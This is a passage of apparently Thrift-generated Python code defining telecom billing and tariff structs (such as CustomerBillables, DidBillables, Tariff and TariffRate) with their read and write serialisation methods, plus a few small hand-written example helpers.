oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AccountBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 2)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.i_commission_agent is not None:
oprot.writeFieldBegin('i_commission_agent', TType.STRUCT, 3)
self.i_commission_agent.write(oprot)
oprot.writeFieldEnd()
if self.commission_size is not None:
oprot.writeFieldBegin('commission_size', TType.DOUBLE, 4)
oprot.writeDouble(self.commission_size)
oprot.writeFieldEnd()
if self.i_wholesaler is not None:
oprot.writeFieldBegin('i_wholesaler', TType.I64, 5)
oprot.writeI64(self.i_wholesaler)
oprot.writeFieldEnd()
if self.fresh_balance is not None:
oprot.writeFieldBegin('fresh_balance', TType.DOUBLE, 6)
oprot.writeDouble(self.fresh_balance)
oprot.writeFieldEnd()
if self.plan_only is not None:
oprot.writeFieldBegin('plan_only', TType.BOOL, 7)
oprot.writeBool(self.plan_only)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
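# Hand-written sketch of composing the nested billing structs. Only plain
# scalar fields and the embedded Billables are set; area_name and
# i_commission_agent take the NullString/NullInt64 wrappers defined earlier
# in this module. All values are illustrative assumptions.
def _example_account_billables():
    return AccountBillables(
        bparams=Billables(price_1=0.012, price_n=0.012,
                          interval_1=60, interval_n=6),
        commission_size=0.1,
        i_wholesaler=4,
        fresh_balance=25.0,
        plan_only=False,
    )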
class CustomerBillables(object):
"""
Attributes:
- bparams
- area_name
- i_commission_agent
- commission_size
- i_customer
- i_wholesaler
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'i_commission_agent', (NullInt64, NullInt64.thrift_spec), None, ), # 3
(4, TType.DOUBLE, 'commission_size', None, None, ), # 4
(5, TType.I64, 'i_customer', None, None, ), # 5
(6, TType.I64, 'i_wholesaler', None, None, ), # 6
)
def __init__(self, bparams=None, area_name=None, i_commission_agent=None, commission_size=None, i_customer=None, i_wholesaler=None,):
self.bparams = bparams
self.area_name = area_name
self.i_commission_agent = i_commission_agent
self.commission_size = commission_size
self.i_customer = i_customer
self.i_wholesaler = i_wholesaler
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i_commission_agent = NullInt64()
self.i_commission_agent.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.commission_size = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.i_wholesaler = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CustomerBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 2)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.i_commission_agent is not None:
oprot.writeFieldBegin('i_commission_agent', TType.STRUCT, 3)
self.i_commission_agent.write(oprot)
oprot.writeFieldEnd()
if self.commission_size is not None:
oprot.writeFieldBegin('commission_size', TType.DOUBLE, 4)
oprot.writeDouble(self.commission_size)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 5)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.i_wholesaler is not None:
oprot.writeFieldBegin('i_wholesaler', TType.I64, 6)
oprot.writeI64(self.i_wholesaler)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class DidBillables(object):
"""
Attributes:
- bparams
- i_did
- did
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.I64, 'i_did', None, None, ), # 2
(3, TType.STRING, 'did', 'UTF8', None, ), # 3
)
def __init__(self, bparams=None, i_did=None, did=None,):
self.bparams = bparams
self.i_did = i_did
self.did = did
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('DidBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.i_did is not None:
oprot.writeFieldBegin('i_did', TType.I64, 2)
oprot.writeI64(self.i_did)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 3)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class BuyingDidBillables(object):
"""
Attributes:
- bparams
- did
- i_connection
- i_did_authorization
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.STRING, 'did', 'UTF8', None, ), # 2
(3, TType.I64, 'i_connection', None, None, ), # 3
(4, TType.I64, 'i_did_authorization', None, None, ), # 4
)
def __init__(self, bparams=None, did=None, i_connection=None, i_did_authorization=None,):
self.bparams = bparams
self.did = did
self.i_connection = i_connection
self.i_did_authorization = i_did_authorization
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_did_authorization = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('BuyingDidBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 2)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 3)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
if self.i_did_authorization is not None:
oprot.writeFieldBegin('i_did_authorization', TType.I64, 4)
oprot.writeI64(self.i_did_authorization)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CustomerDidBillables(object):
"""
Attributes:
- bparams
- did
- i_customer
- i_did
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.STRING, 'did', 'UTF8', None, ), # 2
(3, TType.I64, 'i_customer', None, None, ), # 3
(4, TType.I64, 'i_did', None, None, ), # 4
)
def __init__(self, bparams=None, did=None, i_customer=None, i_did=None,):
self.bparams = bparams
self.did = did
self.i_customer = i_customer
self.i_did = i_did
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_did = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CustomerDidBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 2)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 3)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.i_did is not None:
oprot.writeFieldBegin('i_did', TType.I64, 4)
oprot.writeI64(self.i_did)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CreditTimes(object):
"""
Attributes:
- crtime_acct
- crtime_ext
- rtime
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'crtime_acct', (MonoTime, MonoTime.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'crtime_ext', (MonoTime, MonoTime.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'rtime', (MonoTime, MonoTime.thrift_spec), None, ), # 3
)
def __init__(self, crtime_acct=None, crtime_ext=None, rtime=None,):
self.crtime_acct = crtime_acct
self.crtime_ext = crtime_ext
self.rtime = rtime
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.crtime_acct = MonoTime()
self.crtime_acct.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.crtime_ext = MonoTime()
self.crtime_ext.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.rtime = MonoTime()
self.rtime.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CreditTimes')
if self.crtime_acct is not None:
oprot.writeFieldBegin('crtime_acct', TType.STRUCT, 1)
self.crtime_acct.write(oprot)
oprot.writeFieldEnd()
if self.crtime_ext is not None:
oprot.writeFieldBegin('crtime_ext', TType.STRUCT, 2)
self.crtime_ext.write(oprot)
oprot.writeFieldEnd()
if self.rtime is not None:
oprot.writeFieldBegin('rtime', TType.STRUCT, 3)
self.rtime.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Duration(object):
"""
Attributes:
- nanoseconds
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'nanoseconds', None, None, ), # 1
)
def __init__(self, nanoseconds=None,):
self.nanoseconds = nanoseconds
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.nanoseconds = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Duration')
if self.nanoseconds is not None:
oprot.writeFieldBegin('nanoseconds', TType.I64, 1)
oprot.writeI64(self.nanoseconds)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
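# Hand-written helpers: Duration carries an integer nanosecond count, so
# converting to and from float seconds is a simple scale by 1e9.
def _example_seconds_to_duration(seconds):
    return Duration(nanoseconds=int(round(seconds * 1e9)))
def _example_duration_to_seconds(d):
    return (d.nanoseconds or 0) / 1e9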
class Tariff(object):
"""
Attributes:
- post_call_surcharge
- connect_fee
- name
- i_tariff
- free_seconds
- i_owner
- iso_4217
- grace_period
- max_loss
- average_duration
- loss_protection
- local_calling
- local_calling_cli_validation_rule
- last_change_count
- local_id
- remote_id
- is_remote
- is_exportable
- decimal_precision
- cost_round_up
"""
thrift_spec = (
None, # 0
(1, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 1
(2, TType.DOUBLE, 'connect_fee', None, None, ), # 2
(3, TType.STRUCT, 'name', (NullString, NullString.thrift_spec), None, ), # 3
(4, TType.I64, 'i_tariff', None, None, ), # 4
(5, TType.I32, 'free_seconds', None, None, ), # 5
(6, TType.I64, 'i_owner', None, None, ), # 6
(7, TType.STRING, 'iso_4217', 'UTF8', None, ), # 7
(8, TType.I32, 'grace_period', None, None, ), # 8
(9, TType.DOUBLE, 'max_loss', None, None, ), # 9
(10, TType.I32, 'average_duration', None, None, ), # 10
(11, TType.BOOL, 'loss_protection', None, None, ), # 11
(12, TType.BOOL, 'local_calling', None, None, ), # 12
(13, TType.STRING, 'local_calling_cli_validation_rule', 'UTF8', None, ), # 13
(14, TType.I64, 'last_change_count', None, None, ), # 14
(15, TType.STRUCT, 'local_id', (NullString, NullString.thrift_spec), None, ), # 15
(16, TType.STRUCT, 'remote_id', (NullString, NullString.thrift_spec), None, ), # 16
(17, TType.BOOL, 'is_remote', None, None, ), # 17
(18, TType.BOOL, 'is_exportable', None, None, ), # 18
(19, TType.I32, 'decimal_precision', None, None, ), # 19
(20, TType.BOOL, 'cost_round_up', None, None, ), # 20
)
def __init__(self, post_call_surcharge=None, connect_fee=None, name=None, i_tariff=None, free_seconds=None, i_owner=None, iso_4217=None, grace_period=None, max_loss=None, average_duration=None, loss_protection=None, local_calling=None, local_calling_cli_validation_rule=None, last_change_count=None, local_id=None, remote_id=None, is_remote=None, is_exportable=None, decimal_precision=None, cost_round_up=None,):
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.name = name
self.i_tariff = i_tariff
self.free_seconds = free_seconds
self.i_owner = i_owner
self.iso_4217 = iso_4217
self.grace_period = grace_period
self.max_loss = max_loss
self.average_duration = average_duration
self.loss_protection = loss_protection
self.local_calling = local_calling
self.local_calling_cli_validation_rule = local_calling_cli_validation_rule
self.last_change_count = last_change_count
self.local_id = local_id
self.remote_id = remote_id
self.is_remote = is_remote
self.is_exportable = is_exportable
self.decimal_precision = decimal_precision
self.cost_round_up = cost_round_up
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.name = NullString()
self.name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_tariff = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.i_owner = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.iso_4217 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.DOUBLE:
self.max_loss = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.average_duration = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.BOOL:
self.loss_protection = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.BOOL:
self.local_calling = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.STRING:
self.local_calling_cli_validation_rule = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.I64:
self.last_change_count = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.STRUCT:
self.local_id = NullString()
self.local_id.read(iprot)
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.STRUCT:
self.remote_id = NullString()
self.remote_id.read(iprot)
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.BOOL:
self.is_remote = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.BOOL:
self.is_exportable = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.I32:
self.decimal_precision = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.BOOL:
self.cost_round_up = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Tariff')
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 1)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 2)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRUCT, 3)
self.name.write(oprot)
oprot.writeFieldEnd()
if self.i_tariff is not None:
oprot.writeFieldBegin('i_tariff', TType.I64, 4)
oprot.writeI64(self.i_tariff)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 5)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.i_owner is not None:
oprot.writeFieldBegin('i_owner', TType.I64, 6)
oprot.writeI64(self.i_owner)
oprot.writeFieldEnd()
if self.iso_4217 is not None:
oprot.writeFieldBegin('iso_4217', TType.STRING, 7)
oprot.writeString(self.iso_4217.encode('utf-8') if sys.version_info[0] == 2 else self.iso_4217)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 8)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.max_loss is not None:
oprot.writeFieldBegin('max_loss', TType.DOUBLE, 9)
oprot.writeDouble(self.max_loss)
oprot.writeFieldEnd()
if self.average_duration is not None:
oprot.writeFieldBegin('average_duration', TType.I32, 10)
oprot.writeI32(self.average_duration)
oprot.writeFieldEnd()
if self.loss_protection is not None:
oprot.writeFieldBegin('loss_protection', TType.BOOL, 11)
oprot.writeBool(self.loss_protection)
oprot.writeFieldEnd()
if self.local_calling is not None:
oprot.writeFieldBegin('local_calling', TType.BOOL, 12)
oprot.writeBool(self.local_calling)
oprot.writeFieldEnd()
if self.local_calling_cli_validation_rule is not None:
oprot.writeFieldBegin('local_calling_cli_validation_rule', TType.STRING, 13)
oprot.writeString(self.local_calling_cli_validation_rule.encode('utf-8') if sys.version_info[0] == 2 else self.local_calling_cli_validation_rule)
oprot.writeFieldEnd()
if self.last_change_count is not None:
oprot.writeFieldBegin('last_change_count', TType.I64, 14)
oprot.writeI64(self.last_change_count)
oprot.writeFieldEnd()
if self.local_id is not None:
oprot.writeFieldBegin('local_id', TType.STRUCT, 15)
self.local_id.write(oprot)
oprot.writeFieldEnd()
if self.remote_id is not None:
oprot.writeFieldBegin('remote_id', TType.STRUCT, 16)
self.remote_id.write(oprot)
oprot.writeFieldEnd()
if self.is_remote is not None:
oprot.writeFieldBegin('is_remote', TType.BOOL, 17)
oprot.writeBool(self.is_remote)
oprot.writeFieldEnd()
if self.is_exportable is not None:
oprot.writeFieldBegin('is_exportable', TType.BOOL, 18)
oprot.writeBool(self.is_exportable)
oprot.writeFieldEnd()
if self.decimal_precision is not None:
oprot.writeFieldBegin('decimal_precision', TType.I32, 19)
oprot.writeI32(self.decimal_precision)
oprot.writeFieldEnd()
if self.cost_round_up is not None:
oprot.writeFieldBegin('cost_round_up', TType.BOOL, 20)
oprot.writeBool(self.cost_round_up)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
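# Hand-written sketch: every struct in this module exposes its wire layout
# via thrift_spec, so field ids, names and TType codes can be enumerated
# generically without touching the protocol classes.
def _example_list_tariff_fields():
    return [(spec[0], spec[2], spec[1])  # (field id, name, ttype)
            for spec in Tariff.thrift_spec if spec is not None]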
class TariffRate(object):
"""
Attributes:
- i_rate
- prefix
- i_tariff
- price_1
- price_n
- interval_1
- interval_n
- forbidden
- grace_period_enable
- local_price_1
- local_price_n
- local_interval_1
- local_interval_n
- area_name
- activation_date
- expiration_date
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_rate', None, None, ), # 1
(2, TType.STRING, 'prefix', 'UTF8', None, ), # 2
(3, TType.I64, 'i_tariff', None, None, ), # 3
(4, TType.DOUBLE, 'price_1', None, None, ), # 4
(5, TType.DOUBLE, 'price_n', None, None, ), # 5
(6, TType.I32, 'interval_1', None, None, ), # 6
(7, TType.I32, 'interval_n', None, None, ), # 7
(8, TType.BOOL, 'forbidden', None, None, ), # 8
(9, TType.BOOL, 'grace_period_enable', None, None, ), # 9
(10, TType.DOUBLE, 'local_price_1', None, None, ), # 10
(11, TType.DOUBLE, 'local_price_n', None, None, ), # 11
(12, TType.I32, 'local_interval_1', None, None, ), # 12
(13, TType.I32, 'local_interval_n', None, None, ), # 13
(14, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 14
(15, TType.STRUCT, 'activation_date', (UnixTime, UnixTime.thrift_spec), None, ), # 15
(16, TType.STRUCT, 'expiration_date', (UnixTime, UnixTime.thrift_spec), None, ), # 16
)
def __init__(self, i_rate=None, prefix=None, i_tariff=None, price_1=None, price_n=None, interval_1=None, interval_n=None, forbidden=None, grace_period_enable=None, local_price_1=None, local_price_n=None, local_interval_1=None, local_interval_n=None, area_name=None, activation_date=None, expiration_date=None,):
self.i_rate = i_rate
self.prefix = prefix
self.i_tariff = i_tariff
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.forbidden = forbidden
self.grace_period_enable = grace_period_enable
self.local_price_1 = local_price_1
self.local_price_n = local_price_n
self.local_interval_1 = local_interval_1
self.local_interval_n = local_interval_n
self.area_name = area_name
self.activation_date = activation_date
self.expiration_date = expiration_date
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_rate = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_tariff = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
